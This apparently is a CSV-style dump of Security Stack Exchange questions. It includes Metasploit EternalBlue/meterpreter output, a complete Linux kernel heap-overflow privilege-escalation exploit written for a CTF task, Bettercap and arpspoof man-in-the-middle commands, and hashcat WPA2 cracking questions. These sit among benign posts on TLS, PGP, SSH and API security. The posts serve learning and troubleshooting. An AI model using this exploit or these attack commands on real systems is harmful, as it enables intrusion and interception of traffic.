+[+] 10.0.0.7:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
+[*] 10.0.0.7:445 - Sending egg to corrupted connection.
+[*] 10.0.0.7:445 - Triggering free of corrupted buffer.
+[*] https://10.0.0.1:443 handling request from 10.0.0.7; (UUID: ym6hhk2d) Staging x64 payload (207449 bytes) ...
+[*] Meterpreter session 5 opened (10.0.0.1:443 -> 10.0.0.7:2350) at 2020-01-07 14:56:49 -0500
+[-] 10.0.0.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+[-] 10.0.0.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+[-] 10.0.0.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+ +

It goes on and on for 4 times until it finishes without ""working"" sessions. It does open them but if you interact with them, they are dead.

+ +

Also like on 2008, if I switch to reverse_tcp or http works just fine.

+ +

No encoders used.

+ +

Tried with both x86 and x64 payloads (in my short experience I've seen matching OS arch and payload does help but sometimes...)

+ +

Tried also with meterpreter/reverse_winhttps (because of WinInet and WinHTTP, but I didn't read deep on this so maybe I' m missing something there too).

+ +

Was also working with msfvenom and creating payloads to execute over these 2 systems.

+ +

Results were the following:

+ +

On the win2008r2, no matter what, I am unable to create a meterpreter session on the attacker. The exe runs fine and creates a connection back to the attacker; I can even see on the attacker box how it receives connections and answers back (the stages, I believe), but since the msfconsole handler reports nothing, I am a bit lost.

+ +

Tried the same setup with reverse_tcp and reverse_http payloads and both works fine, creating session and so.

+ +

On the win7, finally success with reverse_https. The payload generated with msfvenom is connecting back to attacker and creating the session.

+ +

Win7 also working with reverse_tcp and reverse_http payloads.

+ +

What am I missing about the https payload?

+ +
OS: Linux kali 5.3.0-kali3-amd64 #1 SMP Debian 5.3.15-1kali1
+
+Metasploit
+Framework: 5.0.66-dev
+Console : 5.0.66-dev
+
+ +

Summary:

+ +

reverse_https works only in Win7 when it is created with msfvenom and executed manually in the target machine. It won't work using it as a payload for a common exploit like eternalblue, launched from an attacker machine in metasploit.

+ +

For 2008, I can't make it work either from metasploit or with manual execution from the target machine.

+ +

What I am trying to get out of this is an understanding of why it is failing: whether I am missing something regarding the reverse_https payload, or whether it is a specific or known issue with reverse_https and win7/2008r2.

+ +

I have run a packet capture with tcpdump and Wireshark, and I saw on the attacker machine how it receives traffic from the victim and also how it sends traffic back to the victim; communication is established and flowing, but no session is created in the listener.

+",224639,,54284,,1/8/2020 21:04,1/8/2020 21:04,Help with meterpreter reverse https,,0,2,0,,,CC BY-SA 4.0 +223859,1,223862,,1/8/2020 11:25,,-1,269,"

Everyone says a computer virus replicates/attaches itself to another host file. This concept is not clear to me. I have read many articles but unable to understand how.

+ +

Say, virus V1 is the original virus. It has a payload saying ""Hello World"". +Two machines (M1 and M2) are available, each with 3 files. +At first, V1 is present on M1. It inserts payload within other 3 files. It can do so because the payload code is written within the virus V1. When files at M1 is executed, they display ""Hello World"".

+ +

How these infected files at M1 can infect files of M2?

+ +

How a virus can contain its own code (entire code) within itself?

+ +

It will be easy for me if anyone can address my question with an example or pseudo-code.

+",103202,,6253,,1/8/2020 11:45,1/8/2020 11:54,How a virus injects itself to another machine's file?,,1,10,,,,CC BY-SA 4.0 +223863,1,,,1/8/2020 12:23,,1,140,"

I am currently trying to solve an exercise where I should look at a TLS 1.2 handshake trace while having access to pre and both randoms (server random and client random).

+ +

In order to decrypt application data, I need to rebuild the master key.

+ +

But I am struggling with finding the section where it is negotiated how this master key is actually built from pre and randoms.

+ +

How does TLS 1.2 handle that? Is there maybe a default handling?

+",209776,,6253,,1/8/2020 12:30,1/23/2020 13:46,TLS 1.2. Handshake: Where do Client and Server negotiate how the master key is built from randoms and pre?,,1,6,,,,CC BY-SA 4.0 +223869,1,,,1/8/2020 15:23,,4,177,"

The site in question is the UK regulator for companies at https://ewf.companieshouse.gov.uk. Online access to a company on this site enables the user to file/change various critical things on behalf of the company including the name, address, owners, directors, annual accounts, etc. The public records that these generate are often relied upon by external institutions such as banks. A successful attacker can therefore potentially take over a company and its assets.

+ +

The security policy consists of this:

+ +
    +
  1. You first login to the site with a site account by supplying an email address and password. However, this should be considered irrelevant because any site account can proceed to step 2 - there is no correlation between site accounts and company accounts. To put it another way, step 1 can be bypassed by simply registering a new site account and logging in with that.
  2. +
  3. You then login to a company account by supplying a company number (which is publicly available information) and an authentication code. To reiterate, any site account can login to any company account. As far as I can tell, a site account serves no purpose other than to get you to the company account login screen.
  4. +
  5. The policy is somewhat opaque but as far as I can tell from experimenting, the authentication code consists of exactly 6 characters, and can only be made up of capital letters and numbers. This means there are 36^10 = 2,176,782,336 possible codes.
  6. +
  7. The initial authentication code is sent to the registered address of the company by snail mail.
  8. +
  9. The code can be changed, but a copy of the new code is again sent out by snail mail.
  10. +
+ +

Risks:

+ +
    +
  1. Poor password selection criteria.
  2. +
  3. Plaintext storage of the password.
  4. +
  5. Exposure of the password whilst in transit in the post.
  6. +
+ +

Further assumptions:

+ +
    +
  • Asking the regulator to change their policy is likely to be a waste of time (unless someone knows a legal route to force the issue).
  • +
  • The regulator is a monopoly so there is no possibility to take my ""business"" elsewhere.
  • +
  • It is possible to deregister an authentication code, but this is even less secure as the company can then be managed by post, with no security checks at all (i.e. the regulator will accept at face value anything it receives in the post). Having online access prevents this for certain types of filings.
  • +
+ +

Given the above, what steps should I take to mitigate the risks? My plan so far includes frequent code changes, checking the mail for signs of tampering, and shredding the letters upon receipt. On the other hand, I wonder if this may be a case where changing the code is more harmful than useful, as it increases the chances of it being exposed in the post.

+",17049,,78324,,4/7/2020 21:44,4/7/2020 21:44,How to mitigate insecure password policy that I am forced to use?,,0,7,,,,CC BY-SA 4.0 +223872,1,,,1/8/2020 18:06,,1,69,"

I'm using webcrypto, not PGP/GPG.

+ +

I would like to use a key pair to create a ""subkey"" that is authorized by my primary key in a way anyone can publicly verify so I don't need to expose the primary key's private component to any web-facing systems.

+ +

My idea is to:

+ +
    +
  • primary key signs a hash of subkeys public component
  • +
  • then use the subkeys private key (proving it has access) to encrypt this signed blob
  • +
+ +

Verification would be:

+ +
  • use the subkey's public key to decrypt the signature
  • use the primary key's public key to verify the signature.
+ +

Would this be safe? Do I need to add any tamper protection (AEAD/HMAC)? I'm interested in an answer for both ECC and RSA.

+",3927,,,,,1/8/2020 18:06,How to authorize a subkey using a primary master key pair?,,0,0,,,,CC BY-SA 4.0 +223873,1,223881,,1/8/2020 19:17,,21,7478,"

I am building a web site that provides user login. For that, I am currently researching good strategies for dealing with authentication.

+ +

How I'm doing it right now

+ +

My current concept is modeled after what seems to be the common consensus right now. Passwords are salted with 64 bytes from /dev/urandom and then hashed with 100 rounds of SHA-512. After every round, the original password is concatenated to the result and then fed into the next round. When a user wants to log in, they send their credentials to the server, where the described procedure is then repeated (using the same salt, obviously) and compared to the hash in the database.

+ +

This strategy seems adequately secure to me (please correct me if I'm wrong, it is basically just the result of reading a lot of online guides and watching YouTube videos). However, I think it has a major flaw, which is the client having to send the password in plain text to the server. Yes, I naturally use HTTPS, but still, if the connection was somehow compromised for whatever reason, so is the password.

+ +

The alternative concept

+ +

So I thought of an entirely different approach: using PGP keys. When a user signs up, they generate a PGP key pair, encrypt the private key using a password of their choice and send it to the server. When they want to log in again, the server generates a string of random characters and encrypts it using the public key. The encrypted random string and key pair are then sent to the client, who will need to decrypt it again to prove they have the private key's password.

+ +

This method would prevent the password from ever being transmitted over the network and even allow for cool stuff like end-to-end encrypted chat between users. The only drawback I could find is the server having to give out encrypted private keys to basically anyone who requests them, making brute-force attacks way easier. I could mitigate that by running a computationally expensive key expansion algorithm on the client side and use the result of that for encrypting the private key.

+ +

But I still don't really trust the whole thing, and so I would love to hear your feedback on whether this is a good idea or if I should just stick with how I'm doing it right now.

+ +

EDIT:

+ +

Based on some of the answers, I think my question is a little misleading. My requirement is that the only thing users ever need to provide for successful authentication is their username/password and nothing else, regardless of what device they are using or whether they were logged in on that device before.

+",224666,,224666,,1/9/2020 15:18,2/25/2021 21:37,Is PGP for user authentication a good idea?,,8,14,3,,,CC BY-SA 4.0 +223876,1,,,1/8/2020 20:31,,5,193,"

I manage an application that connects to various servers using a client-specific keypair. We have around 70 customers; all but one can connect to our FTP server (for SCP) after first accepting the RSA fingerprint (which hasn't changed in ~5 years).

+ +

To illustrate this behavior, I'm trying to SCP to the server every 15 minutes and dumping the result to /tmp/scp_(timestamp).log. The one client that can't connect was first presented with a round-robin of three different fingerprints:

+ +
$ grep -hA1 'The fingerprint for the RSA key' /tmp/scp_*.log | grep -E '[0-9a-f:]{16}' | sort | uniq -c
+    129 14:4c:06:43:01:53:81:ef:b7:fd:09:46:91:06:c1:c9.
+     98 34:9c:3f:13:f5:c4:74:9c:bd:b0:ff:4e:63:aa:eb:4c.
+     97 36:dd:a7:90:4c:71:06:95:3c:e6:f3:ad:2a:96:c3:6a.
+
+ +

Recently, though, I started seeing truly random (to me, anyway) fingerprints:

+ +
$ grep -hA1 'The fingerprint for the RSA key' /tmp/scp_*.log | grep -E '[0-9a-f:]{16}' | sort | uniq -c | head
+      1 02:5f:20:15:68:ea:0e:69:ef:7a:cc:1a:00:94:3f:96.
+      1 02:a0:62:65:bc:41:6b:35:cf:4c:c2:fc:66:72:d8:5a.
+      1 02:bb:5a:18:f1:ea:ca:71:f1:52:12:16:8c:85:5b:cc.
+      3 02:c6:73:85:a9:94:82:f6:7e:51:a9:26:e7:d3:f7:7f.
+      2 03:53:8c:74:b5:c1:dd:e4:7d:4b:17:e1:05:47:60:68.
+      1 03:b3:c8:c6:c1:ef:54:28:65:4c:5f:73:f4:43:39:93.
+      2 03:c7:8a:76:77:39:55:96:2e:c0:13:4a:21:f2:0d:51.
+      2 06:8d:17:f9:cd:e0:10:4c:d0:44:58:8b:66:f8:f5:a8.
+      1 07:fa:59:2b:90:96:4a:4c:85:eb:4a:37:91:d7:8e:0f.
+      2 0d:21:b5:86:8e:ae:4e:97:87:f6:42:c7:e4:11:c0:4a.
+$ grep -hA1 'The fingerprint for the RSA key' /tmp/scp_*.log | grep -E '[0-9a-f:]{16}' | sort | uniq -c | wc -l
+253
+
+ +

I was confused by only three fingerprints but at this point I'm baffled by this number (253!!!) and ready to throw in the towel on trying to understand why this is happening. All I really have been able to figure out is that this started mid-November 2019.

+ +

But wait, there's more. Somehow, after seeing no successful authentications after this mysterious event in November, I saw some successful connections last week!

+ +
$ grep '^2019.*abc.*authenticated' sftp_8{1,2}.log | tail -2
+2019-11-17 13:00:02,623 [18508]: user 'abc' authenticated via 'publickey' method
+2019-11-17 13:00:17,351 [18514]: user 'abc' authenticated via 'publickey' method
+$ grep '^2020.*abc.*authenticated' sftp_8{1,2}.log
+2020-01-03 16:13:01,874 [6339]: user 'abc' authenticated via 'publickey' method
+2020-01-03 16:17:21,147 [6665]: user 'abc' authenticated via 'publickey' method
+2020-01-03 16:18:46,564 [6713]: user 'abc' authenticated via 'publickey' method
+2020-01-03 16:19:02,504 [6825]: user 'abc' authenticated via 'publickey' method
+2020-01-03 16:15:10,228 [24179]: user 'abc' authenticated via 'publickey' method
+2020-01-03 16:18:57,216 [24494]: user 'abc' authenticated via 'publickey' method
+$ 
+
+ +

To further muddy the waters, the customer server is not our hardware so I'm contractually limited in what I can do on this server.

+ +

Again, N-1 out of N (~70) customers can connect with the fingerprint I've seen for five years. I'm just looking for a push in the right direction. Thanks for reading!
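One check I have in mind is to record, from the client side, exactly which RSA host key is being presented on each attempt, so the apparently random fingerprints can be compared over time (the host name below is a placeholder):

# record whatever RSA host key the far end presents right now
ssh-keyscan -t rsa customerhost.example.com >> observed_hostkeys.txt
# print MD5 fingerprints in the same colon-separated form as the log excerpts above
ssh-keygen -l -E md5 -f observed_hostkeys.txt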

+",224672,,,,,1/8/2020 20:31,Why am I getting seemingly random fingerprints back when connecting via SSH/SCP?,,0,2,1,,,CC BY-SA 4.0 +223878,1,,,1/8/2020 21:13,,2,28,"

I want to crack an 8 character password, but I know this password doesn't contain more than 4 symbols, 4 uppercase letters, 4 lowercase letters and 4 numbers, and it contains at least 2 symbols, 2 uppercase letters, 2 lowercase letters and 2 numbers.

+ +

The character set I'm using is 94 (brute-force) characters long. My PC has a rate of 70 MH/s (roughly 70,000,000 hashes per second) with a GTX 1660 Ti using hashcat. This means it would take around 2 years and 9 months to reach the most unlucky end of the keyspace.

+ +

With these limits, the time might decrease significantly, but how can I set such limits in hashcat (how do I create such a mask)? Also, how can I calculate its running time?
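For reference, this is the kind of mask attack I have been experimenting with. A single hashcat mask fixes one character class per position, so it can only cover one ordering of the classes; covering the whole policy would need a list of masks (an .hcmask file), which a tool like policygen from PACK can generate. The file name below is a placeholder and -m 2500 assumes a WPA/WPA2 .hccapx capture:

# one fixed ordering: 2 upper, 2 lower, 2 digits, 2 specials
hashcat -m 2500 -a 3 capture.hccapx '?u?u?l?l?d?d?s?s'
# candidates for this single ordering: 26*26*26*26*10*10*33*33 ~= 5.0e10,
# i.e. roughly 12 minutes at 70 MH/s; the full policy multiplies this by
# the number of allowed arrangements of the character classes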

+",224674,,6253,,1/8/2020 22:15,1/8/2020 22:15,How can I crack WPA2 hash with some limitations?,,0,4,,1/8/2020 22:21,,CC BY-SA 4.0 +223880,1,,,1/8/2020 21:37,,0,2108,"

I found the following strange HTTP request apparently emanating from binaryedge.ninja:

+ +
 min-li-ustx-12-13-65991-x-prod.binaryedge.ninja - - [05/Jan/2020:07:18:48 -0500] ""GET / HTTP/1.0"" 302 212 ""-"" ""-""
+ min-extra-grab-108-ustx-prod.binaryedge.ninja - - [05/Jan/2020:07:18:52 -0500] ""GET / HTTP/1.0"" 302 212 ""-"" ""-""
+ min-extra-grab-108-ustx-prod.binaryedge.ninja - - [05/Jan/2020:07:18:54 -0500] ""HELP"" 400 226 ""-"" ""-""
+ min-extra-grab-108-ustx-prod.binaryedge.ninja - - [05/Jan/2020:07:18:54 -0500] ""\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc"" 400 226 ""-"" ""-""
+ min-extra-grab-108-ustx-prod.binaryedge.ninja - - [05/Jan/2020:07:18:56 -0500] ""\x16\x03\x01"" 400 226 ""-"" ""-""
+ min-extra-grab-108-ustx-prod.binaryedge.ninja - - [05/Jan/2020:07:18:58 -0500] ""\xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff"" 400 226 ""-"" ""-""
+
+ +

Looking around the web, I see similar log messages on other publicly visible web logs and one suggesting some connection to Gh0st.

+ +

Does anyone have any idea what this is, and why this company would appear to be attacking my server and others?

+",40249,,40249,,1/8/2020 21:43,1/16/2020 23:42,Strange HTTP request from binaryedge.ninja,,1,4,,,,CC BY-SA 4.0 +223884,1,223889,,1/8/2020 23:53,,3,2218,"

When attempting to verify google server's certificate chain using openssl, I am getting error.

+ +

Extract google's server and intermediate certificates:

+ +
+

$ echo | openssl s_client -showcerts -connect www.google.com:443 | sed + -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /tmp/server_certs.crt

+
+ +

Extract google's root CA from jdk:

+ +
+

$ pwd

+ +

/cygdrive/c/Program Files/Java/jdk1.8.0_231/jre/lib/security

+ +

$ keytool -export -keystore cacerts -storepass changeit -alias 'globalsignr2ca [jdk]' -file /cygwin64/tmp/google_root.der

+ +

$ openssl x509 -in /tmp/google_root.der -out /tmp/google_root.pem -inform der

+
+ +

Also extracted google's root certificate from chrome browser to /tmp/google-chrome-root.pem. Doing a diff between chrome's root certificate and jdk extracted root certificate, there is no difference

+ +
+

$ diff /tmp/google_root.pem /tmp/google-chrome-root.pem

+ +

Based on this, I know I am using the right root certificate.

+
+ +

Invoke openssl verify

+ +
+

$ openssl verify -CAfile /tmp/google_root.pem /tmp/server_certs.crt

+ +

C = US, ST = California, L = Mountain View, O = Google LLC, CN = www.google.com

+ +

error 20 at 0 depth lookup: unable to get local issuer certificate + error /tmp/server_certs.crt: verification failed

+
+ +

I know verification through

+ +
+

$ openssl s_client -showcerts -servername www.google.com -connect www.google.com:443

+
+ +

is successful

+ +
CONNECTED(00000005) depth=2 OU = GlobalSign Root CA - R2, O =
+GlobalSign, CN = GlobalSign verify return:1 depth=1 C = US, O = Google
+Trust Services, CN = GTS CA 1O1 verify return:1 depth=0 C = US, ST =
+California, L = Mountain View, O = Google LLC, CN = www.google.com
+verify return:1
+
+ +

and was expecting a similar successful result through the openssl verify command as well.

+ +

I am doing this exercise in windows 10 and cygwin.
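One thing I have not tried yet: as far as I understand, openssl verify does not use the additional certificates inside the target file to build the chain, so the GTS intermediate has to be supplied explicitly via -untrusted. A sketch of what I mean, assuming the two certificates are saved out of /tmp/server_certs.crt in the order the server sent them (file names are placeholders):

# leaf.pem  = first certificate from server_certs.crt (www.google.com)
# inter.pem = second certificate (the GTS CA 1O1 intermediate)
openssl verify -CAfile /tmp/google_root.pem -untrusted inter.pem leaf.pem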

+",224680,,,,,1/9/2020 2:51,verification of certificate chain using openssl verify command,,1,2,,,,CC BY-SA 4.0 +223890,1,223892,,1/9/2020 2:55,,4,1407,"

I need to photograph an image containing a steganographically hidden message, then decode the stego content from the photograph without recourse to the original image data. Are there any steganography algorithms that would make the task more reliable?

+ +

Note: I tried the Least Significant Bit (LSB) method, but when I processed the photos from the camera there was too much distortion.

+",188275,,113729,,1/10/2020 7:28,1/11/2020 18:21,How can I recover steganographically hidden data from a photographic copy of the image?,,2,3,1,1/12/2020 4:37,,CC BY-SA 4.0 +223891,1,,,1/9/2020 3:51,,2,409,"

I am currently trying to perform a MitM attack on my home wireless network to get a better understanding on how this attack works. I can successfully perform this attack on a NAT network on some virtual machines but it will not work on my home wireless network with an external WiFi adapter. More specifically, the target devices are not able to load webpages even while still connected to the WiFi. However, I can still view the packets sent from the device to the gateway.

+ +

I have used Bettercap, Ettercap and arpspoof to try to accomplish this and it all fails with the same result. I'm positive that the target IP and the gateway are specified for each tool and I made sure that I enabled IP forwarding with echo 1 > /proc/sys/net/ipv4/ip_forward.

+ +

My only logical conclusion is that it is somehow not successfully redirecting the packets from the target machine to the gateway and vice versa.

+ +

Is anyone able to suggest any fixes? Are some routers able to prevent MitM attacks? Any insight would be greatly appreciated.

+ +

(I am using an Alfa AC1200 wireless adapter and running Kali on a VM. I also have a Bell HomeHub 3000 which is from what I believe exclusive to Canada and manufactured by Sagecom.)

+ +

Edit:

+ +

Bettercap

+ +

bettercap -iface wlan0 +net.probe on +set arp.spoof.targets 192.168.2.28 +set arp.spoof.fullduplex true +arp.spoof on +set net.sniff.local true +net.sniff on

+ +

Arpspoof

+ +

arpspoof -i wlan0 -t 192.168.2.28 -r 192.168.2.1

+",224690,,224690,,1/10/2020 2:07,1/10/2020 2:07,MitM Attack Fails on Home Wireless Router,,0,2,,,,CC BY-SA 4.0 +223893,1,,,1/9/2020 6:50,,3,229,"

I have been looking at OWASP and other forms of checklists on testing web applications. One of the best practices is to ensure session IDs generated are sufficiently random and unpredictable.

+ +

Assume that I am a corporate end user without permission to install software on my laptop, who wants to test the security of a web application from my web browser.

+ +

From my understanding, if we were to have a web app that always enforce an encrypted HTTPS (SSL/TLS) connection to prevent the disclosure of the session ID through MitM (Man-in-the-Middle) attacks, this ensures that anyone cannot simply capture the session ID from web browser traffic.

+ +

If the session IDs are indeed encrypted due to HTTPS, are we still able to determine if the session IDs are sufficiently random and unpredictable? I was asking myself this question and for me, a close and probable answer I would give myself, is no. (I might be wrong)

+ +

Am I also right to say that, to know whether session IDs are generated randomly and unpredictably, you would actually need access to the internal web application code? There are probably a lot more checks that I can't do without additional tools to gather more information on the web application.

+ +

What are the other kind of test cases - as an end user, who might not have advanced tools to sniff the network or to read underlying code, to test more comprehensively and value-add on my test cases on the web applications? For e.g. testing for invalid input and seeing if errors are thrown.

+",224694,,224694,,1/9/2020 6:55,1/29/2022 13:08,Testing web applications from an end user's perspective,,2,1,,,,CC BY-SA 4.0 +223898,1,,,1/9/2020 8:44,,1,105,"

While trying to solve old ctf task (https://blog.frizn.fr/plaidctf-2013/pwn-400-servr) I've encountered a situation which I don't understand.

+ +

TL;DR

+ +

After escalating process privileges, my exploit invokes system(""/bin/sh""). The shell gets spawned, but after the first command (which gets executed as root) the kernel panics.

+ +

+ +

Long description

+ +

I abuse a kernel heap overflow to overwrite an allocated file struct's file_operations field with the address of a fake struct file_operations. The fake struct file_operations is filled with the address of my escalate function. Then I call lseek on the file, and escalate gets invoked through the fake file_operations. If escalate got called (meaning I overwrote the right struct file), I call the pop_shell function:

+ + + +
void pop_shell() {
+    printf(""\t[+] Poping shell... have fun!\n"");
+    system(""/bin/sh"");
+    printf(""\t[ ] Had fun?\n"");
+    exit(0);
+}
+
+ +

The shell gets spawned and I can even execute one command such as cat /root/flag. The result gets displayed and then the kernel immediately panics. I would expect the kernel to panic after I exit system(""/bin/sh""), not after executing exactly one command. I would be super happy to hear an explanation for why this happens.

+ +

Full exploit:

+ + + +
/**
+ * Compile with: gcc exploit.c -o exploit -O0 -std=c99 -Wall --static
+ */
+
+#define _GNU_SOURCE
+#include <asm/types.h>
+#include <mqueue.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <linux/netlink.h>
+#include <pthread.h>
+#include <errno.h>
+#include <stdbool.h>
+#include <sched.h>
+#include <stddef.h>
+#include <sys/mman.h>
+#include <stdint.h>
+#include <sys/ioctl.h>
+#include <fcntl.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+
+typedef int (*commit_creds_func_t)(void *new);
+typedef void *(*prepare_kernel_cred_func_t)(void *daemon);
+
+#define SERVER_PORT 80
+#define HEAP_SPRAY_POWER 0x400
+#define FILE_STRUCT_SLAB_SIZE 256
+#define MSG_PREFIX ""GET aaa HTTP/1.1\r\n""   \
+                   ""Content-Length:232\r\n"" \
+                   ""\r\n""
+
+#define COMMIT_CREDS ((void *)0xffffffff81063250)
+#define PREPARE_KERNEL_CRED ((void *)0xffffffff81063510)
+
+#define commit_creds(cred) \
+    (((commit_creds_func_t)(COMMIT_CREDS))(cred))
+#define prepare_kernel_cred(daemon) \
+    (((prepare_kernel_cred_func_t)(PREPARE_KERNEL_CRED))(daemon))
+
+
+int g_server_sock_fd;
+int g_fds[HEAP_SPRAY_POWER];
+uint64_t g_fake_fops[20];
+uint64_t g_overflow_msg[37];
+size_t g_overflow_msg_len;
+int g_escalated;
+
+
+void pop_shell() {
+    printf(""\t[+] Poping shell... have fun!\n"");
+    system(""/bin/sh"");
+    printf(""\t[ ] Had fun?\n"");
+    exit(0);
+}
+
+void escalate()
+{
+    commit_creds(prepare_kernel_cred(NULL));
+    g_escalated = 1;
+}
+
+int send_overflow_msg()
+{
+    if (write(g_server_sock_fd, g_overflow_msg, g_overflow_msg_len) < 0)
+    {
+        perror(""\t[!] Failed to send msg"");
+        return -1;
+    }
+    printf(""\t[+] Send msg\n"");
+
+    return 0;
+}
+
+int init()
+{
+    struct sockaddr_in server_addr;
+
+    g_server_sock_fd = socket(AF_INET, SOCK_STREAM, 0);
+    if (g_server_sock_fd < 0)
+    {
+        perror(""\t[!] Failed to create socket"");
+        return -1;
+    }
+    printf(""\t[+] Created socket\n"");
+
+    bzero(&server_addr, sizeof(server_addr));
+    server_addr.sin_family = AF_INET;
+    server_addr.sin_addr.s_addr = inet_addr(""127.0.0.1"");
+    server_addr.sin_port = htons(SERVER_PORT);
+    if (connect(g_server_sock_fd, &server_addr, sizeof(server_addr)) != 0)
+    {
+        perror(""\t[!] Failed to connect to server"");
+        return -1;
+    }
+    printf(""\t[+] Connected to server\n"");
+
+    for (int i = 0; i < 20; ++i)
+    {
+        g_fake_fops[i] = (uint64_t)&escalate;
+    }
+
+    /* Fill g_overflow_msg structure with msg_prefix concatenated with addresses of g_fake_fops. */
+    g_overflow_msg_len = strlen(MSG_PREFIX) + FILE_STRUCT_SLAB_SIZE;
+    memcpy((void *)g_overflow_msg, MSG_PREFIX, strlen(MSG_PREFIX));
+    /* This is possible as strlen(MSG_PREFIX) % 8 == 0. */
+    for (int i = strlen(MSG_PREFIX) / sizeof(uint64_t); i < g_overflow_msg_len / sizeof(uint64_t); ++i)
+    {
+        g_overflow_msg[i] = (uint64_t)&g_fake_fops;
+    }
+
+    g_escalated = 0;
+
+    printf(""\t[i] Address of g_fake_fops: %p\n"", g_fake_fops);
+    printf(""\t[i] Address of escalate function: %p\n"", &escalate);
+    printf(""\t[i] Address of g_escalated: %p\n"", &g_escalated);
+    return 0;
+}
+
+void overflow_struct_file()
+{
+    char file_path[0x100];
+
+    /* Make kernel allocate multiple struct file. */
+    for (int i = 0; i < HEAP_SPRAY_POWER; ++i)
+    {
+        sprintf(file_path, ""/tmp/file_%d"", i);
+        g_fds[i] = open(file_path, O_CREAT | O_RDWR, 0644);
+    }
+    /* Now make kernel free every second struct file, creating holes in slabs. */
+    for (int i = 0; i < HEAP_SPRAY_POWER; i += 2)
+    {
+        if (g_fds[i])
+        {
+            close(g_fds[i]);
+            g_fds[i] = 0;
+        }
+    }
+    /* And quickly try to allocate msg so it lands in the hole and overflow one of the struct files. */
+    send_overflow_msg();
+}
+
+int main()
+{
+    printf(""*** Starting Exploit ***\n"");
+
+    printf(""[ ] Initializing...\n"");
+    if (init() < 0)
+    {
+        printf(""[-] Failed to initialize\n"");
+        return -1;
+    }
+    printf(""[+] Succeeded to initialize\n"");
+
+    printf(""[ ] Overflowing struct file...\n"");
+    overflow_struct_file();
+    printf(""[+] Finished overflow phase, can't be sure yet if we succeeded\n"");
+
+    /* Wait 3 seconds to know if we havn't overwriten some critical structure instead of struct file. */
+    printf(""Sleeping... (if kernel panic now, it means we overflowed not ours stuct)"");
+    fflush(stdout);
+    for (int i = 0; i < 3; ++i)
+    {
+        sleep(1);
+        printf("" %i"", i);
+        fflush(stdout);
+    }
+    printf(""\n"");
+
+    printf(""[ ] Triggering exploit...\n"");
+    for (int i = 0; i < HEAP_SPRAY_POWER && !g_escalated; ++i)
+    {
+        if (g_fds[i])
+            lseek(g_fds[i], 0, SEEK_END);
+    }
+
+    if (g_escalated) {
+        printf(""[+] Exploit succeeded\n"");
+        pop_shell();
+    }
+    printf(""[-] Exploit failed\n"");
+
+    return 0;
+}
+
+",222863,,,,,1/9/2020 8:44,Kernel exploit fails after executing first command,,0,0,,,,CC BY-SA 4.0 +223901,1,,,1/9/2020 8:58,,2,115,"

I keep receiving email intended for a Gmail address similar to mine, but without the dots (.) that my address contains. For example: my email address is john.grisham@gmail.com, and its inbox receives emails intended for johngrisham@gmail.com

+ +

Question 1: Will the other party also receive my emails? Question 2: How can I get rid of this problem?

+",224663,,,,,1/9/2020 9:25,"Gmail Email id, dot(.) recognition",,1,2,,1/9/2020 9:27,,CC BY-SA 4.0 +223903,1,223965,,1/9/2020 9:41,,5,1648,"

I am performing some research on IoT test tools and came across the HackRF One which can transmit and receive from 1 MHz to 6 GHz. I therefore think that it can analyze many protocols, but I cannot find a list of them anywhere. Can it for example analyze (and exploit) Zigbee, Z-Wave, LoRaWAN, RFID and NFC? Why is there no list, because there are too many protocols? Is the HackRF a more general sniffer then?

+ +

I also came across some specific protocol sniffers, like the Suphacap Z-Wave Sniffer and the Proxmark and so on. What are the advantages of these over the HackRF? Is the best option to start with a HackRF and then when necessary buy specific sniffers according to the needs of the current pentest?

+ +

I would like to know this because then I know which devices to acquire for penetration testing.

+",219620,,,,,3/24/2020 18:53,What are the advantages and disadvantages of using a HackRF One compared to specific protocol sniffers?,,3,5,,,,CC BY-SA 4.0 +223904,1,223907,,1/9/2020 11:21,,3,1677,"

I'm building a fairly simple web application at the moment but because I have plans on turning this into sort of a multi-project portfolio app, I've decided to decouple the back-end and the front-end. That way I can easily integrate my other projects into this front-end.

+ +

At the moment I have a public GET route that anyone can visit to see info about a project (api/project/id), this only fetches data from the corresponding ID and returns a JSON collection. I then use React to consume it and display the data.

+ +

Since this part is supposed to be publicly accessible I can't use JWT or user authentication to protect it, and you can't delete, edit or put things into the database from it. It's not insecure because all you can do is read data from the project with ID (which is properly escaped).

+ +

But this also means anyone can look at my React code, find the API link and then use my JSON data (for whatever reason). I don't think it's really a problem but is there anyway you can protect the public endpoint so that only my server can actually use it?

+ +

The back-end is on port 8080 and the front-end is on port 80. The back-end is PHP, both the front-end and back-end is served by nginx. CORS is enabled since they are on two different ports.

+ +

I know I can check the origin header and match it against my front-end but surely the origin header can be spoofed. I can't use authentication since it is supposed to be public but I'd like it to be only accessible to my server and then publicly displayed.

+ +

Maybe I can reverse proxy it somehow so they both listen on 80 while still being on two different ports? I have UFW on my server, can I only allow connections to port 8080 from my own server IP/domain? Can I check the IP of the request to the back-end, since my front-end is requesting it then in my API I should be able to only allow my own servers IP to access it?

+ +

